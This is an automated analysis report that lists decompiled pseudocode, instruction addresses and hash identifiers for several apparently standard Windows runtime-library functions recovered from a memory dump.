						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x4747b84 = _t75;
						_t73 = E0466EB70(_t134, 0x4747b60);
						if( *0x4747b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0466FF60( *0x4747b20);
							}
						}
						goto L5;
					}
				}
			}

0x0468fab0
0x0468fab2
0x0468fab3
0x0468fab4
0x0468fabc
0x0468fac0
0x0468fb14
0x0468fb17
0x0468fac2
0x0468fac8
0x0468facd
0x0468fad3
0x0468fad3
0x0468fadd
0x0468fb18
0x0468fb1b
0x0468fb1d
0x0468fb1e
0x0468fb1f
0x0468fb20
0x0468fb21
0x0468fb22
0x0468fb23
0x0468fb24
0x0468fb25
0x0468fb26
0x0468fb27
0x0468fb28
0x0468fb29
0x0468fb2a
0x0468fb2b
0x0468fb2c
0x0468fb2d
0x0468fb2e
0x0468fb2f
0x0468fb3a
0x0468fb3b
0x0468fb3e
0x0468fb41
0x0468fb44
0x0468fb47
0x0468fb4a
0x0468fb4d
0x0468fb53
0x046cbdcb
0x046cbdcb
0x0468fb59
0x0468fb5b
0x0468fb5b
0x0468fb5e
0x046cbdd5
0x046cbdd8
0x00000000
0x046cbdda
0x00000000
0x046cbdda
0x0468fb64
0x0468fb64
0x0468fb64
0x0468fb67
0x0468fb6e
0x0468fb70
0x0468fb72
0x00000000
0x0468fb78
0x0468fb7a
0x0468fb7a
0x0468fb7d
0x0468fb80
0x046cbddf
0x046cbde1
0x00000000
0x046cbde3
0x00000000
0x046cbde3
0x0468fb86
0x0468fb86
0x0468fb86
0x0468fb8b
0x0468fb90
0x0468fb92
0x0468fb94
0x0468fb9a
0x0468fb9b
0x0468fba1
0x046cbde8
0x046cbdeb
0x046cbded
0x046cbeb5
0x046cbeb5
0x046cbebb
0x046cbebd
0x046cbec3
0x046cbed2
0x046cbedd
0x046cbedd
0x046cbeed
0x00000000
0x046cbdf3
0x046cbdfe
0x046cbe06
0x046cbe0b
0x046cbe0d
0x046cbe0f
0x046cbe14
0x046cbe19
0x046cbe20
0x046cbe25
0x046cbe27
0x046cbe35
0x046cbe39
0x046cbe46
0x046cbe4f
0x046cbe54
0x046cbe56
0x046cbef8
0x046cbef8
0x00000000
0x046cbe5c
0x046cbe5c
0x046cbe60
0x00000000
0x046cbe66
0x046cbe7f
0x046cbe84
0x046cbe87
0x046cbe89
0x046cbe8b
0x046cbe99
0x046cbe9d
0x046cbea0
0x046cbeac
0x046cbeaf
0x046cbeb1
0x046cbeb3
0x046cbeb3
0x00000000
0x046cbea2
0x046cbea2
0x00000000
0x046cbea2
0x046cbe8d
0x046cbe8d
0x046cbe92
0x00000000
0x046cbe92
0x046cbe8b
0x046cbe60
0x046cbe3b
0x046cbe3b
0x046cbe3e
0x00000000
0x046cbe40
0x046cbe40
0x046cbe44
0x00000000
0x00000000
0x00000000
0x00000000
0x046cbe44
0x046cbe3e
0x046cbe29
0x046cbe29
0x00000000
0x046cbe29
0x046cbe27
0x00000000
0x0468fba7
0x0468fba7
0x0468fbab
0x046cbf02
0x0468fbb1
0x0468fbb1
0x0468fbb8
0x0468fbbd
0x0468fbbd
0x0468fbbf
0x0468fbbf
0x0468fbc5
0x0468fbcb
0x0468fbf8
0x0468fbf8
0x0468fbfa
0x00000000
0x0468fc00
0x0468fc00
0x0468fc03
0x00000000
0x0468fc09
0x0468fc09
0x0468fc0f
0x0468fc15
0x0468fc23
0x0468fc23
0x0468fc25
0x0468fc27
0x0468fc75
0x0468fc7c
0x0468fc84
0x00000000
0x0468fc29
0x0468fc29
0x0468fc2d
0x0468fc30
0x046cbf0f
0x00000000
0x0468fc36
0x0468fc38
0x0468fc3b
0x0468fc41
0x046cbf17
0x046cbf19
0x046cbf48
0x046cbf4b
0x00000000
0x046cbf1b
0x046cbf22
0x046cbf24
0x046cbf26
0x00000000
0x046cbf2c
0x046cbf37
0x046cbf39
0x046cbf3b
0x00000000
0x046cbf41
0x046cbf41
0x046cbf41
0x046cbf41
0x046cbf45
0x00000000
0x046cbf45
0x046cbf3b
0x046cbf26
0x00000000
0x0468fc47
0x0468fc47
0x0468fc49
0x0468fcb2
0x0468fcb4
0x0468fcb6
0x0468fcdc
0x0468fcdc
0x00000000
0x0468fcb8
0x0468fcc3
0x0468fcc5
0x0468fcc7
0x00000000
0x0468fcc9
0x0468fcc9
0x0468fccd
0x00000000
0x0468fccd
0x0468fcc7
0x00000000
0x0468fc4b
0x0468fc4b
0x0468fc4e
0x0468fc4e
0x0468fc51
0x0468fc51
0x0468fc54
0x0468fc5a
0x0468fc5c
0x0468fc5f
0x0468fc61
0x0468fc63
0x0468fc65
0x0468fc67
0x0468fc6e
0x0468fc72
0x0468fc72
0x0468fc72
0x0468fc72
0x0468fc67
0x0468fc61
0x00000000
0x0468fc5a
0x0468fc49
0x0468fc41
0x0468fc30
0x0468fc27
0x0468fc03
0x0468fbcd
0x0468fbd3
0x0468fbd9
0x0468fbdc
0x0468fbde
0x0468fc99
0x0468fc9b
0x0468fc9d
0x0468fcd5
0x0468fcd5
0x0468fc89
0x0468fc89
0x00000000
0x0468fc9f
0x0468fc9f
0x0468fca3
0x00000000
0x0468fca3
0x00000000
0x0468fbe4
0x0468fbe4
0x0468fbe4
0x0468fbe4
0x0468fbe9
0x0468fbf2
0x00000000
0x0468fbf2
0x0468fbde
0x0468fbcb
0x0468fbab
0x0468fc8b
0x0468fc8b
0x0468fc8c
0x0468fb80
0x0468fb72
0x0468fb5e
0x0468fc8d
0x0468fc91
0x0468fadf
0x0468fadf
0x0468fae1
0x0468fae4
0x0468fae7
0x0468faec
0x0468faf8
0x0468fb00
0x0468fb07
0x0468fb0f
0x0468fb0f
0x0468fb07
0x00000000
0x0468faf8
0x0468fadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 046CBE0F

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: dbb24cdcffe2c5f9ec557a378038d0aeb88ccd88eeae44e094a446a128453253
Instruction ID: 6969a1ad91efc9ebe558a0b451f55156c113aeb8c12becfb068913fa693fa140
Opcode Fuzzy Hash: dbb24cdcffe2c5f9ec557a378038d0aeb88ccd88eeae44e094a446a128453253
Instruction Fuzzy Hash: 87A1D271B00606CBEB29EF68C45077AB3A5EB58B14F04466EE946DB780FB34F941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04652D8A, Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E04652D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x4745350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x4747bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E046997C0();
				}
				if( *0x47479c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x47479c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E04681624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E04677D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E046EFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E04699520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0468E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L046ADF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x4746901;
								_push(_t109);
								_v52 = _t98;
								if( *0x4746901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E04699980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E046995D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E04677D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E04677D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E046D7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E046EFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x4745350;
							if(_t109 != 0x4745350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E046EFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E046E5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x04652d8a
0x04652d8a
0x04652d92
0x04652d96
0x04652d9e
0x04652da0
0x04652da3
0x04652da5
0x04652da8
0x04652dab
0x04652db2
0x046af9aa
0x046af9ab
0x046af9ae
0x046af9ae
0x04652db8
0x04652dc2
0x046af9b9
0x046af9be
0x046af9bf
0x046af9bf
0x04652dcf
0x046af9c9
0x04652dd5
0x04652dd5
0x04652dd5
0x04652dde
0x04652de1
0x04652e70
0x04652e72
0x04652e72
0x04652de7
0x04652deb
0x04652e7c
0x04652e83
0x04652e85
0x04652e8b
0x04652e8d
0x04652e92
0x04652e92
0x04652e85
0x04652df1
0x04652df7
0x04652df9
0x04652df9
0x04652dfc
0x04652dff
0x04652e02
0x00000000
0x04652e05
0x04652e0c
0x046af9d9
0x04652e12
0x04652e12
0x04652e12
0x04652e1a
0x046af9e3
0x046af9e9
0x046af9f0
0x046af9f6
0x046af9f8
0x046af9f8
0x046af9f0
0x04652e23
0x046afa02
0x046afa03
0x046afa05
0x046afa06
0x00000000
0x04652e29
0x04652e29
0x04652e2e
0x04652e34
0x04652e3e
0x00000000
0x00000000
0x04652e44
0x04652e47
0x04652e4d
0x00000000
0x00000000
0x04652e4f
0x04652e54
0x00000000
0x00000000
0x04652e5a
0x04652e5f
0x04652e9a
0x04652ea4
0x04652ea5
0x04652ea8
0x04652eaf
0x04652eb2
0x04652eb5
0x046afae9
0x046afaeb
0x046afaed
0x046afaef
0x046afaf7
0x046afaf8
0x046afafd
0x046afaff
0x046afb04
0x046afb04
0x046afaff
0x04652ec0
0x04652ec4
0x04652ec6
0x04652ec8
0x046afb14
0x046afb18
0x046afb1e
0x046afb21
0x046afb21
0x04652ece
0x04652ece
0x04652ece
0x04652ed7
0x04652e61
0x04652e63
0x046afa6b
0x046afa71
0x046afa76
0x046afa78
0x046afa8a
0x046afa7a
0x046afa83
0x046afa83
0x046afa8f
0x046afa91
0x046afa97
0x046afa9d
0x046afaa4
0x046afaaa
0x046afaaf
0x046afab1
0x046afac3
0x046afab3
0x046afabc
0x046afabc
0x046afac8
0x046afacb
0x046afadf
0x046afadf
0x046afacb
0x046afaa4
0x046afa91
0x04652e6f
0x04652e6f
0x04652e5f
0x046afa13
0x046afa15
0x046afa17
0x046afa1f
0x046afa21
0x046afa22
0x046afa25
0x046afa28
0x046afa2f
0x046afa2f
0x046afa2a
0x046afa2a
0x046afa2a
0x046afa31
0x046afa34
0x046afa36
0x046afa3c
0x046afa3e
0x046afa41
0x046afa43
0x046afa45
0x046afa45
0x046afa41
0x046afa3c
0x046afa4a
0x046afa4f
0x046afa51
0x046afa53
0x046afa56
0x046afa5b
0x046afa5e
0x00000000
0x046afa5e
0x04652e23

Strings

RTL: Re-Waiting, xrefs: 046AFA4A

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 0f61456f49f0f3207a9872431c766981d8e562a8fb23d1bf0144ab8f908fbea6
Instruction ID: e93fcfe1b0a8e307e3e389ac2d29e5747327fca126d62567dd09a717d1bcebcd
Opcode Fuzzy Hash: 0f61456f49f0f3207a9872431c766981d8e562a8fb23d1bf0144ab8f908fbea6
Instruction Fuzzy Hash: 26610271A00A44EFEB25DF68C890BBE77A5EB44318F1442AAD911973D0F734BD428F92

Uniqueness

Uniqueness Score: -1.00%

Function 04720EA5, Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E04720EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0471FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E04721074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E04699730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0471A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0471A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x4748b04 >> 0x14) + (_v44 -  *0x4748b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E04677D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0471138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E04677D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0470FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x4748724 & 0x00000008) != 0) {
						E047152F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E047215B5(0x4748ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x04720eb7
0x04720eb9
0x04720ec0
0x04720ec2
0x04720ecd
0x0472105b
0x0472105b
0x04721061
0x04721066
0x04721066
0x0472106b
0x04721073
0x04721073
0x04720ed3
0x04720ed6
0x04720edc
0x04720ee0
0x04720ee7
0x04720ef0
0x04720ef5
0x04720efa
0x04720efc
0x04720efd
0x04720f03
0x04720f04
0x04720f06
0x04720f07
0x04720f09
0x04720f0e
0x04720f14
0x04720f23
0x04720f2d
0x04720f34
0x04720f34
0x04720f14
0x04720f52
0x00000000
0x00000000
0x04720f58
0x04720f73
0x04720f74
0x04720f79
0x04720f7d
0x04720f80
0x04720f86
0x04720fab
0x04720fb5
0x04720fc6
0x04720fd1
0x04720fe3
0x04720fd3
0x04720fdc
0x04720fdc
0x04720feb
0x04721009
0x04721009
0x04721015
0x04721027
0x04721017
0x04721020
0x04721020
0x0472102f
0x0472103c
0x0472103c
0x04721048
0x04721050
0x04721050
0x04721055
0x00000000
0x04721055
0x04720f88
0x04720f9e
0x04720fa2
0x04720fa9
0x00000000
0x00000000
0x00000000
0x04720fa9
0x00000000

Strings

`, xrefs: 04720F16

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 80666360acb124a2fa793ea91a3154cc9699f73ae39e68d8b4d0f839394e14da
Instruction ID: 9442235626fd575435e3c7bde19d3ac24696339399e3b14003dc354e95291b0a
Opcode Fuzzy Hash: 80666360acb124a2fa793ea91a3154cc9699f73ae39e68d8b4d0f839394e14da
Instruction Fuzzy Hash: 6A5179712043919FE325DF28DA84B2BB7E5FBC4704F04492DF99696391D670F846CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0468F0BF, Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0468F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E04674120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E04699830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E04699990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E046995D0();
							goto L11;
						} else {
							_t109 = L04674620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0469F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E046995D0();
										L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x0468f0d3
0x0468f0d9
0x0468f0e0
0x0468f0e7
0x0468f0f2
0x0468f0f4
0x0468f0f8
0x0468f100
0x0468f108
0x0468f10d
0x0468f115
0x0468f116
0x0468f11f
0x0468f123
0x0468f124
0x0468f12c
0x0468f130
0x0468f134
0x0468f13d
0x0468f144
0x0468f14b
0x0468f152
0x046cbab0
0x046cbab0
0x0468f158
0x0468f158
0x0468f15a
0x0468f160
0x0468f165
0x0468f166
0x0468f16f
0x0468f173
0x046cbaa7
0x046cbaa7
0x046cbaab
0x00000000
0x0468f179
0x0468f18d
0x0468f191
0x046cbaa2
0x00000000
0x0468f197
0x0468f19b
0x0468f1a2
0x0468f1a9
0x0468f1af
0x0468f1b2
0x0468f1b6
0x0468f1b9
0x0468f1c4
0x0468f1d8
0x0468f1df
0x0468f1e3
0x0468f1eb
0x0468f1ee
0x0468f1f4
0x0468f20f
0x046cbab7
0x046cbabb
0x046cbacc
0x046cbad1
0x0468f215
0x0468f218
0x0468f226
0x0468f22b
0x00000000
0x0468f22b
0x0468f1f6
0x0468f1f6
0x0468f1f9
0x0468f1fb
0x0468f1fb
0x0468f1f4
0x0468f191
0x0468f173
0x0468f152
0x0468f203

Strings

@, xrefs: 0468F124

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 5893d9c8e47ee1f647d795042e92a8dd27bc65399faf99bee686c4c6a1c87139
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: C4516871604710AFD320DF69C841A6BBBE8FF48B14F008A2EF99587690E7B4E904CB95

Uniqueness

Uniqueness Score: -1.00%

Function 046D3540, Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E046D3540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x474d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E04690BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E046D3706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0469FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E046D3540;
						E0469FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E046ADDD0( &_v1072, _t75, _t79, _t80, _t81);
						E046E0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E046997C0();
					}
					return E0469B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E046D3971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E046D3884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0469FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E04699650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E046D3787(_a4,  &_v352, _t80);
						}
					}
					L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E046995D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x046d3552
0x046d355a
0x046d355d
0x046d3566
0x046d3567
0x046d357e
0x046d358f
0x046d35a1
0x046d35a5
0x046d366b
0x046d366b
0x046d366d
0x046d3672
0x046d3679
0x046d3685
0x046d368d
0x046d369d
0x046d36a7
0x046d36b8
0x046d36c6
0x046d36c7
0x046d36dc
0x046d36e1
0x046d36e7
0x046d36e9
0x046d36e9
0x046d3703
0x046d3703
0x046d35b5
0x046d35c0
0x046d35c4
0x00000000
0x00000000
0x046d35ca
0x046d35d7
0x046d35e2
0x046d35e6
0x046d35e8
0x046d35f5
0x046d35fa
0x046d3603
0x046d3604
0x046d3609
0x046d360a
0x046d3612
0x046d3613
0x046d361e
0x046d3622
0x046d3628
0x046d362f
0x046d362f
0x046d3636
0x046d3638
0x046d363b
0x046d3642
0x046d3642
0x046d3636
0x046d3657
0x046d3657
0x046d365c
0x046d3662
0x046d3669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 046D358F

Memory Dump Source

